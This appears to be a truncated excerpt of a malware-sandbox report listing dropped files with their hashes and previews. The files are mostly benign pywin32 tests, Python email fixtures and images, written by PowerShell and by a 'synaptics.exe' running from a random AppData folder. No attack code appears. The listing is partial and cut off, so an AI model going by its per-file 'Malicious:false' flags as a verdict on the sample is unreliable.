                                                                                                                                                                                                            Preview:import os..import sys..import threading..import time..import unittest....import win32trace..from pywin32_testutil import TestSkipped....if __name__ == "__main__":.. this_file = sys.argv[0]..else:.. this_file = __file__......def SkipIfCI():.. # This test often fails in CI, probably when it is being run multiple times.. # (ie, for different Python versions).. # Github actions always have a `CI` variable... if "CI" in os.environ:.. raise TestSkipped("We skip this test on CI")......def CheckNoOtherReaders():.. win32trace.write("Hi").. time.sleep(0.05).. if win32trace.read() != "Hi":.. # Reset everything so following tests still fail with this error!.. win32trace.TermRead().. win32trace.TermWrite().. raise AssertionError(.. "An existing win32trace reader appears to be ".. "running - please stop this process and try again".. )......class TestInitOps(unittest.TestCase):.. def setUp(self):.. Sk
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5827
                                                                                                                                                                                                            Entropy (8bit):4.762504073262377
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:YBphoBYZnvTD+9aqXwkRztOPqdbO/Xx2XRWyZQZbrbbM6bka6cwjKbA:YxnvTD+93XDztOP2VBW8Q93/wjoA
                                                                                                                                                                                                            MD5:344607156144443C466402F7DB5A9ECA
                                                                                                                                                                                                            SHA1:2F57849FDAE8BCE69937314A8A4B8743EF8388EC
                                                                                                                                                                                                            SHA-256:48998C849A0141C5DBB522E8982873D357333BF00A942EB66BF24BDC19008BA9
                                                                                                                                                                                                            SHA-512:24E2A0059A19CFF93D7334178BD225B63F9B36A9FF05B8348DE474C7A92FB8195C5E4FD1B7E9742E04AA0C004F66D3209F481D70D09B1B9A00DA893116B8EAB5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import unittest....import netbios..import win32api..import win32wnet....RESOURCE_CONNECTED = 0x00000001..RESOURCE_GLOBALNET = 0x00000002..RESOURCE_REMEMBERED = 0x00000003..RESOURCE_RECENT = 0x00000004..RESOURCE_CONTEXT = 0x00000005..RESOURCETYPE_ANY = 0x00000000..RESOURCETYPE_DISK = 0x00000001..RESOURCETYPE_PRINT = 0x00000002..RESOURCETYPE_RESERVED = 0x00000008..RESOURCETYPE_UNKNOWN = 0xFFFFFFFF..RESOURCEUSAGE_CONNECTABLE = 0x00000001..RESOURCEUSAGE_CONTAINER = 0x00000002..RESOURCEDISPLAYTYPE_GENERIC = 0x00000000..RESOURCEDISPLAYTYPE_DOMAIN = 0x00000001..RESOURCEDISPLAYTYPE_SERVER = 0x00000002..RESOURCEDISPLAYTYPE_SHARE = 0x00000003......NETRESOURCE_attributes = [.. ("dwScope", int),.. ("dwType", int),.. ("dwDisplayType", int),.. ("dwUsage", int),.. ("lpLocalName", str),.. ("lpRemoteName", str),.. ("lpComment", str),.. ("lpProvider", str),..]....NCB_attributes = [.. ("Command", int),.. ("Retcode", int),.. ("Lsn", int),.. ("Num", int),.. # ("Buf
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7257
                                                                                                                                                                                                            Entropy (8bit):4.414785333767068
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:DfLmKz0Te/Z/ZWk99rZ69bdo224rTI9AocnB:DfSm0TQWk99sEcnB
                                                                                                                                                                                                            MD5:895F375EACFCBDE14869471B30A4EA3E
                                                                                                                                                                                                            SHA1:F436FD911C416599AA0D2B525C7047F3705FF208
                                                                                                                                                                                                            SHA-256:0573ECBB4855F249DA1990AB09CB3D73367103732E69467D203E30815ADDDDA1
                                                                                                                                                                                                            SHA-512:E714BA936BD6B177BF4EAD01AD08C74F2AA6C2D82A3A59455586313F53C1DDFCEE956D6496C1DB749BFBD4B7C1040518EF232DE0A5099A68ED7F943888A5551B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import os..import re..import sys..import traceback..import unittest....import pywin32_testutil....# A list of demos that depend on user-interface of *any* kind. Tests listed..# here are not suitable for unattended testing...ui_demos = """GetSaveFileName print_desktop win32cred_demo win32gui_demo.. win32gui_dialog win32gui_menu win32gui_taskbar.. win32rcparser_demo winprocess win32console_demo.. win32clipboard_bitmapdemo.. win32gui_devicenotify.. NetValidatePasswordPolicy""".split()..# Other demos known as 'bad' (or at least highly unlikely to work)..# desktopmanager: hangs (well, hangs for 60secs or so...)..# EvtSubscribe_*: must be run together:..# SystemParametersInfo: a couple of the params cause markh to hang, and there's..# no great reason to adjust (twice!) all those system settings!..bad_demos = """desktopmanager win32comport_demo.. EvtSubscribe_pull EvtSubscribe_push.. SystemParameters
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 33 x 33 x 4, image size 660, cbSize 778, bits offset 118
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):778
                                                                                                                                                                                                            Entropy (8bit):3.1275984527229412
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:4giJF9YnuKLG1jRsOuhsuyR5ejFKzRvqasurl99OOyHrLn:4bK61VMxFalw
                                                                                                                                                                                                            MD5:527ACF2CA463153A889C0D30366EFAC1
                                                                                                                                                                                                            SHA1:9A2FF9C2B217CB1A8541B6B44AB92080E4EA0935
                                                                                                                                                                                                            SHA-256:19623132815DADA9EA5C7C4883227F768BC904D7C2C5CFCE4259D21B14DF1CB1
                                                                                                                                                                                                            SHA-512:FA6D0B602628F5752BF5A9B58E0BA234B904DC571970FB426EEBE40072B9581A5BCAC3878B50C5DDA171B7637F87429CD94A6F7209ECBE029426781D46E2458E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:BM........v...(...!...!.............................................................................................................................................................3...................33.333...........33333330..........3:3333333333........330333.3330.........333.30.30.0........3.330......0..........333................3.330................33.................:330............:.....33.............:...:33..............:..30............:.3.30..............:...30...............:.330.........333.....330..........033....33..........33333...33..........333333:.30...........33333030..............0.30..............................................................................................3.................030.................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:MS Windows icon resource - 1 icon, 32x32, 16 colors
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):766
                                                                                                                                                                                                            Entropy (8bit):2.9744570511075614
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:IEipKm6kpU3/tRz//lFWIzldyMQSCrDs+/Co08daaeP:IEiQm6kkRDtFrdyMJCrDs+/CAIP
                                                                                                                                                                                                            MD5:FC2A98F8A8428A9A6D5579C79A94FBD8
                                                                                                                                                                                                            SHA1:5A43595D92FF2E5AB3EFA2DF1A0643A27C09CD1F
                                                                                                                                                                                                            SHA-256:2E7402ED1683A751BB5222A0379E5D8A50E3467E35C0D0D35B2A3CCA645372DC
                                                                                                                                                                                                            SHA-512:FE9ECD2B045670D16AB305E5F6EE943D99B4DA320BE5D23CF5BE9A0FD35ED17A58C7479B23D27FBFA64A8DDE3DF2911FD1738CE46C772E6F55D4072C8CFCCC88
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:...... ..............(... ...@...................................................................................................................................3.................33.333.........33333330......3:3333333333......330333.3330.....333.30.30.0....3.330......0......333............3.330..............33.............:330........:.....33.........:...:33..........:....30..........:.3.30..........:...30...........:.330.....333.....330......033....33......33333...33......333333:.30.......33333030..........0.30..............................................................................3.............030........................................g........................_........0...........................................................................G..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1215
                                                                                                                                                                                                            Entropy (8bit):5.107028635994939
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:1AEwhez6zUh4MmzeyTrelrrMaJfDHxDvO5cfc2NcfUcb0:19C2fmeyUrrMaJrR60
                                                                                                                                                                                                            MD5:C41467241244238BBB6910255075EC94
                                                                                                                                                                                                            SHA1:435C9D938FE2314E18CDB24805C15D3472BA92EC
                                                                                                                                                                                                            SHA-256:65FEA10A4A2D310DC323011B08FBA1A59DE366D9ACDDAD89C62E92656CDD94DB
                                                                                                                                                                                                            SHA-512:63722F8A81F177B1523B072B54924C8C0534E296DEE9494E8989DD4C02800B6829630DB54BA5372185D8066935E91D3A67BC58758228EBC614855DD2AF2D564A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview://{{NO_DEPENDENCIES}}..// Microsoft Developer Studio generated include file...// Used by test.rc..//..#define IDS_TEST_STRING1 51..#define IDS_TEST_STRING2 52..#define IDS_TEST_STRING3 53..#define IDS_TEST_STRING4 54..#define IDS_TEST_STRING5 55..#define IDS_TEST_STRING6 56..#define IDS_TEST_STRING7 57..#define IDD_TEST_DIALOG1 101..#define IDD_TEST_DIALOG2 102..#define IDB_PYTHON 103..#define IDI_PYTHON 105..#define IDD_TEST_DIALOG3 105..#define IDC_EDIT1 1000..#define IDC_CHECK1 1001..#define IDC_EDIT2 1001..#define IDC_COMBO1 1002..#define IDC_SPIN1 1003..#define IDC_PROGRESS1 1004..#define IDC_SLIDER1 1005..#define IDC_LIST1 1006..#define IDC_TREE1 1007..#define IDC_TAB1 1008..#define IDC_ANIMATE1 1009..#define IDC_RICHEDIT1 1010..#define IDC_DATETIMEPICKER1 1011..#define IDC_MONTHCALENDAR1 1012..#define IDC_SCROLLBAR1 1013..#define IDC_SCROLLBAR2 1014..#define IDC_LIST2 1015..#define IDC_HELLO 1016..#define IDC_HELLO2 1017....// Next default values for new objects..//..#ifdef APST
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1670
                                                                                                                                                                                                            Entropy (8bit):5.25854723010019
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:l0H2TWmbT1esm0TcObLNuETO6jG+Qv6mdqm0:G2TWmle8QNETO5zhq1
                                                                                                                                                                                                            MD5:06AF1CAB23D8E639194FA276D5B0B47C
                                                                                                                                                                                                            SHA1:AF1877B0E8B4FDE602313AE1AC5351602EAE8ED9
                                                                                                                                                                                                            SHA-256:8FF6787444BF6E6D9FDF03D8D6FC87F206F925D719ED430D25D748D0A3102246
                                                                                                                                                                                                            SHA-512:9B41D5795287BCCBB55CE6D8C48EB88D9865AEEA8871158DCFC27609479B08D429DC400C9E59CD94D8D20B19F2DEE9D8F681CAABA012F2DF571D47697814F4B4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d/........................@...s....d.Z.d.d.l.T.d.d...Z.d.S.).u.....The sqlite3 extension module provides a DB-API 2.0 (PEP 249) compliant.interface to the SQLite library, and requires SQLite 3.7.15 or newer...To use the module, start by creating a database Connection object:.. import sqlite3. cx = sqlite3.connect("test.db") # test.db will be created or opened..The special path name ":memory:" can be provided to connect to a transient.in-memory database:.. cx = sqlite3.connect(":memory:") # connect to a database in RAM..Once a connection has been established, create a Cursor object and call.its execute() method to perform SQL queries:.. cu = cx.cursor().. # create a table. cu.execute("create table lang(name, first_appeared)").. # insert values into a table. cu.execute("insert into lang values (?, ?)", ("C", 1972)).. # execute a query and iterate over the result. for row in cu.execute("select * from lang"):. print(row).. cx.close()..Th
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2998
                                                                                                                                                                                                            Entropy (8bit):5.134258664791826
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:ly2fEkeTde1j7eBB/KP+7oheXYPX7sV2PXSedPuPXRGqPz0DOPXuPXDFePXd/UTJ:lf8Tdq3gB/6+7oheXYv7sV2vSeRuvRFg
                                                                                                                                                                                                            MD5:C4781086C25F0A3A10D2AAC082E69F9E
                                                                                                                                                                                                            SHA1:3A5870D08E7EF05E17C8E9AC3ADD0D8F98962E04
                                                                                                                                                                                                            SHA-256:E1E99996CA36389D77004DE820BF561E36CED29D41799BED294C0EE60FB06290
                                                                                                                                                                                                            SHA-512:6522E316561A1244D42170DB4454171709739BA531C268FBAE3E420E2B37ADBB00BC13E26F6F20E37BA259062D6C5EE7CF18C1AF5BFC2E746987AEEEDF85AC23
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,db........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.d.Z.d.Z.d.Z.e.j.Z.e.j.Z.e.j.Z.d.d...Z.d.d...Z.d.d...Z.e.d.d...e...d...D.....Z.e.d.d...e...d...D.....Z.e.Z.e.j.j...e.....d.d...Z.e.....d.d...Z.[.d.S.)......N)...*Z.qmark.....z.2.0c....................C........t.t...|...d.d.......S.).N.....)...Date..time..localtime..Z.ticks..r.....=C:\Users\user\AppData\Local\xFSOj9El1Q\lib\sqlite3\dbapi2.py..DateFromTicks)..........r....c....................C...s....t.t...|...d.d.......S.).Nr.........)...Timer....r....r....r....r....r......TimeFromTicks,...r....r....c....................C...r....).Nr....)...Timestampr....r....r....r....r....r......TimestampFromTicks/...r....r....c....................C........g.|.].}.t.|.....q.S.r........int.....0..xr....r....r......<listcomp>2..........r.......c....................C...r....r....r....r....r....r....r....r....3...r....c....................C...sP...d.d...}.d.d...}.d.d...}.d.d...}.t.t.j.|.....t.t.j.|.....t.d.|.....t.d.|.....d.S.)
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:GIF image data, version 87a, 150 x 35
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):896
                                                                                                                                                                                                            Entropy (8bit):7.5598170529390085
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:rrk05NT5AslDIzFlriFUPOmWxz3jksen/5/c+MAIB4W:3kGoMZVwBna+jIB4W
                                                                                                                                                                                                            MD5:AF2C25FE957CF9330A07E0D338E10D0F
                                                                                                                                                                                                            SHA1:6B2D4150569C2A48E256AB0FC82091B16C7CD9EB
                                                                                                                                                                                                            SHA-256:3418A7B482E147AA0793F061BB574A238A67B53A120B3B6E7D31B4F5A7FCC854
                                                                                                                                                                                                            SHA-512:F183D6DD1883E57F4F4F08932419BD9F5C9AA5F4E5E19303227131C364D618EEDDB944D1EAD8A91D3FC79660C4DA7D271B0C9C3515E7AA694AC3A808D23290D0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:GIF87a..#......................................z..p..f..,......#......I..8...`(.di.h..l.p,.tm.x..|....oH......(:.M..P.......u....!.9*9..z.XlQ.w.q.T.Su.|I..Z......j.z...o?B.....j......Gk...}.......Gd.....~............j....r.W..o^T..r.y..y............P.j.3........M.|..j.........j...j.` .....G..b....i..1`.@.$....p...M............m.u/..[.+..h...,.....'",..x.p.\....ykuG.7.....id..CT......,..}..P...gbdY.......=h..@!x\5HR....y...AX.......#G4 ..,.[i.+....;.RCDw..M....@..:`.\I.E ..0`..,.l7.)...j..MA.....|q...`P....x.'..J`j6L.;..H.{.@:.:*"......9.../.F...+.......}.......tp.A....qS...B.d..$.A....5k.(.o.Q..}..gAo.Q...X........&.~..MS}....@'.2......f.@X.<.......D..FA!$.A+.Y.G9.,.....xA\.8.....!........,.W....A...8......^U>@.T.].%"i.....U....hU...a......h.B.=.1...r......(...:..+Vz..-H...X..f.........Az..Cn+H..-..u&Q+...5...pZ....,*3P....p-.1...T.Rw*.*... 8.....k.........;
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):757
                                                                                                                                                                                                            Entropy (8bit):4.904942099535104
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:aWdToG+UOHSwFXUk2K7FMFF+IejeEValpplpJPVVlphlpBPlpdibvSw8:aWdToG+UOHSs5FMXH6UlflbVVl3lvPlL
                                                                                                                                                                                                            MD5:FBBA32714B398097AAA061975EDDC42B
                                                                                                                                                                                                            SHA1:627EA15E97A7D5BF51FB4531A1E1EC8DAEB83C50
                                                                                                                                                                                                            SHA-256:A5A8F44410FB1085689EAAD5A24914E940B0488E0FF2CC3191B972E625522A9E
                                                                                                                                                                                                            SHA-512:CF38D7729ABBAE717A5D2A2DC6DE9B9E39EF7DAD9537838E104E7700D243EB42FCAA5728E0AADE882C2D0AB360364CD3A0C1780A7AF5670DFE1600CE9EF1AF24
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:Send Ppp mailing list submissions to..ppp@zzz.org..To subscribe or unsubscribe via the World Wide Web, visit..http://www.zzz.org/mailman/listinfo/ppp.or, via email, send a message with subject or body 'help' to..ppp-request@zzz.org..You can reach the person managing the list at..ppp-admin@zzz.org..When replying, please edit your Subject line so it is more specific.than "Re: Contents of Ppp digest..."..Today's Topics:.. 1. testing #1 (Barry A. Warsaw). 2. testing #2 (Barry A. Warsaw). 3. testing #3 (Barry A. Warsaw). 4. testing #4 (Barry A. Warsaw). 5. testing #5 (Barry A. Warsaw)..hello...hello...hello...hello...hello...._______________________________________________.Ppp mailing list.Ppp@zzz.org.http://www.zzz.org/mailman/listinfo/ppp..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:SMTP mail, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):507
                                                                                                                                                                                                            Entropy (8bit):5.33393689717218
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:k116Jrnsx4JKmPgNJsXmBQe8jgVB0d+pzBwfXgYfCE3Qv5iv:S4Jrnsx4JSJsXmJjpzafXgSciv
                                                                                                                                                                                                            MD5:ABF4778B3C1ECA76B1819C51C954DE80
                                                                                                                                                                                                            SHA1:BA33895429C397373FDE760ECB94BBC06B986EC5
                                                                                                                                                                                                            SHA-256:AA9E77F6297E6007745040E9B6A2C2BE3880E25206594582E0CD09EF482EE27A
                                                                                                                                                                                                            SHA-512:9BA123106FB1B6286AD51F0465199D22BD3EA3C5A259D0D7DE8B2E7C521176518B1AE09B3B9ED3F7EFC0047D05C9AECC4AC3F7C199A6A466F9430FB2D59E11B9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:Return-Path: <bbb@zzz.org>.Delivered-To: bbb@zzz.org.Received: by mail.zzz.org (Postfix, from userid 889)..id 27CEAD38CC; Fri, 4 May 2001 14:05:44 -0400 (EDT).MIME-Version: 1.0.Content-Type: text/plain; charset=us-ascii.Content-Transfer-Encoding: 7bit.Message-ID: <15090.61304.110929.45684@aaa.zzz.org>.From: bbb@ddd.com (John X. Doe).To: bbb@zzz.org.Cc: ccc@zzz.org.CC: ddd@zzz.org.cc: eee@zzz.org.Subject: This is a test message.Date: Fri, 4 May 2001 14:05:44 -0400...Hi,..Do you like this message?..-Me.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:news or mail, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):376
                                                                                                                                                                                                            Entropy (8bit):5.16391220786579
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:XL5OQ67JXDzYwILQ8KMW0Y0anvXmBWDhwILQ8KMW0Y0anvXmBWMmFDzn:XL8QqzdkQeanvXmB+wkQeanvXmBNmlzn
                                                                                                                                                                                                            MD5:5E165CE977B0894106A802A1C2701B17
                                                                                                                                                                                                            SHA1:1F5227DD1B02483CACF375ACF1C834FAC1A2B471
                                                                                                                                                                                                            SHA-256:395794CDC34731BCE3EA1FF032B1C8BCBC275779325999641C052B771A28D8F9
                                                                                                                                                                                                            SHA-512:69ADE4CBE302B9BC02A73C2ACB9034C5B438CB47B697CD4E288C14CE159C06E8DEE9374F04F1FEBCD95043DAC9AA566A0844E9CB0EA60352576F58C3321D8FBB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:From: aperson@dom.ain.To: bperson@dom.ain.Subject: Test.Content-Type: multipart/mixed; boundary="BOUNDARY"..MIME message.--BOUNDARY.Content-Type: text/plain; charset="us-ascii".MIME-Version: 1.0.Content-Transfer-Encoding: 7bit..One.--BOUNDARY.Content-Type: text/plain; charset="us-ascii".MIME-Version: 1.0.Content-Transfer-Encoding: 7bit..Two.--BOUNDARY--.End of MIME message.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1894
                                                                                                                                                                                                            Entropy (8bit):5.749900459175096
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:w2mzIEjGo1P2RZxe8lUIe9c1DyNASKtZaSzlQeXcMLLEZzDtpSYvcZ0NOzRZxe8P:GzIEJiZHUIe9ySKtZjQeXlodpSWcSUZZ
                                                                                                                                                                                                            MD5:4D452DC300B431813481E8721760E6EC
                                                                                                                                                                                                            SHA1:C5DA8B849F9FE90EC98F5C26B5E8F0E8F8AE8516
                                                                                                                                                                                                            SHA-256:4367F6EF8398E92DE819CCD8E4938C819C2B24AA08F06CDCC0266BB0EC37EB08
                                                                                                                                                                                                            SHA-512:E4755CC09CCD9F2F5226997886A7D22758073B13633E535878DEC4DCBC113768BAE11E0ED27C3F715B2A290C0E124069B7E5B726504F22C85DDE28E45576F500
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:Mime-Version: 1.0.Message-Id: <a05001902b7f1c33773e9@[134.84.183.138]>.Date: Tue, 16 Oct 2001 13:59:25 +0300.To: a@example.com.From: b@example.com.Content-Type: multipart/mixed; boundary="============_-1208892523==_============"..--============_-1208892523==_============.Content-Type: text/plain; charset="us-ascii" ; format="flowed"..Text text text..--============_-1208892523==_============.Content-Id: <a05001902b7f1c33773e9@[134.84.183.138].0.0>.Content-Type: image/jpeg; name="wibble.JPG". ; x-mac-type="4A504547". ; x-mac-creator="474B4F4E".Content-Disposition: attachment; filename="wibble.JPG".Content-Transfer-Encoding: base64../9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEB.AQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQH/wAALCAXABIEBAREA.g6bCjjw/pIZSjO6FWFpldjySOmCNrO7DBZibUXhTwtCixw+GtAijVdqxxaPp0aKvmGXa.qrbBQvms0mAMeYS/3iTV1dG0hHaRNK01XblnWxtVdjkHLMIgTyqnk9VB7CrP2KzIINpa.4O7I+zxYO9WV8jZg71Zlb+8rMDkEirAVQFAUAKAFAAAUAYAUDgADgY6DjpRtXj5RxjHA.4wQRj0wQCMdCAewpa
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:news or mail, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):139
                                                                                                                                                                                                            Entropy (8bit):4.9551820585794975
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:m6eIeAtISin/BIq4vY+KKalIeAtRATmlLehQEZtJJn:GQ67JvLQ8K4DZtDn
                                                                                                                                                                                                            MD5:DB0E7BF714679A813462266F226F6C21
                                                                                                                                                                                                            SHA1:5E3833D17C8BC7F910913DFE549B26A53EE914A6
                                                                                                                                                                                                            SHA-256:CD0DCFAEB8DC99C4EA418B80BF6C13D4AEA912FC699AA3B30DDAF938BDB62E04
                                                                                                                                                                                                            SHA-512:33C91A25EA69BBF724D0614A5056E00D1FB99AF83D3695FCA4E75B756474A4C212DAE7EDDE5EE682557C6EF45DBF5E56973C63DDE9E1D50245F86DE653D868F5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:From: aperson@dom.ain.Content-Type: multipart/mixed; boundary="BOUNDARY"..--BOUNDARY.Content-Type: text/plain..A message part.--BOUNDARY--.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:multipart/mixed; boundary="BOUNDARY", ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):157
                                                                                                                                                                                                            Entropy (8bit):5.186994619337699
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:/eIeAtISin/BIq4x9XWMKE+GV8mf7LTT1VwL13IIJkaq+Jn:/eQ67JKXmudJVwL11aaDn
                                                                                                                                                                                                            MD5:DE3D2C04B4DFD5413C28E0A1E9164526
                                                                                                                                                                                                            SHA1:D6BFAD83AB7DCDBD8B9829A5189996F13740E0A5
                                                                                                                                                                                                            SHA-256:B67EDE3FEDF08CC4FD20C2CCCDEA46F2791F95E0AB991D8CF6C7C66EC81E23C3
                                                                                                                                                                                                            SHA-512:BC75A61F02D21B2901672898275663E4836B66BF24691C738428FE5EFF2D7BA8937AAE81E8821BFCB52C36B78D812380A6D98B670D43DF70EB5E3424F3FEA6EF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:Content-Type: multipart/mixed; boundary="BOUNDARY".MIME-Version: 1.0.Subject: A subject.To: aperson@dom.ain.From: bperson@dom.ain..--BOUNDARY...--BOUNDARY--.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5122
                                                                                                                                                                                                            Entropy (8bit):5.473236921513155
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:OTH5xQ5wBoK2v7DTCd7vTHd7vTEd7vT8d7vTgd7vTR6d7vTId7vTMnvpcZoCeGVT:HqTwk1mu6qyUdXw
                                                                                                                                                                                                            MD5:B3310F3C4AB013EFF4B0C956F242AB57
                                                                                                                                                                                                            SHA1:2D14CCBA83DC6A6F0D36D7D0DBAE7D12D23F8C5C
                                                                                                                                                                                                            SHA-256:B6CBF713954D89EB8389B63343D6B8FD261DC6CB652A0AAF93BE5D801ED0B24E
                                                                                                                                                                                                            SHA-512:A2720AD3F52A8D565EC05293E8B661C636FBC542F62E337E08751C7B468CB5896405266026CAD03D8CDEC2CF59F771DC944610DE3BA72492AA494C1FBE8FEE0E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:From MAILER-DAEMON Fri Apr 06 16:46:09 2001.Received: from [204.245.199.98] (helo=zinfandel.lacita.com)..by www.linux.org.uk with esmtp (Exim 3.13 #1)..id 14lYR6-0008Iv-00..for linuxuser-admin@www.linux.org.uk; Fri, 06 Apr 2001 16:46:09 +0100.Received: from localhost (localhost) by zinfandel.lacita.com (8.7.3/8.6.10-MT4.00) with internal id JAB03225; Fri, 6 Apr 2001 09:23:06 -0800 (GMT-0800).Date: Fri, 6 Apr 2001 09:23:06 -0800 (GMT-0800).From: Mail Delivery Subsystem <MAILER-DAEMON@zinfandel.lacita.com>.Subject: Returned mail: Too many hops 19 (17 max): from <linuxuser-admin@www.linux.org.uk> via [199.164.235.226], to <scoffman@wellpartner.com>.Message-Id: <200104061723.JAB03225@zinfandel.lacita.com>.To: <linuxuser-admin@www.linux.org.uk>.To: postmaster@zinfandel.lacita.com.MIME-Version: 1.0.Content-Type: multipart/report; report-type=delivery-status;..bo.Auto-Submitted: auto-generated (failure)..This is a MIME-encapsulated message..--JAB03225.986577786/zinfandel.lacita.com..The origi
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:RFC 822 mail, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2103
                                                                                                                                                                                                            Entropy (8bit):5.269260948112119
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:4fPE4i5Cr1b04TQc0XkYOw0t9HaVLvUHnsO5Yy:4fPE4iKb0OBqDOd/HaVLvmn9
                                                                                                                                                                                                            MD5:93FDD6045C0B5E293D7495B58C5F1EF3
                                                                                                                                                                                                            SHA1:745711D6FDB6C3612533E9C9DDEA97954A53E882
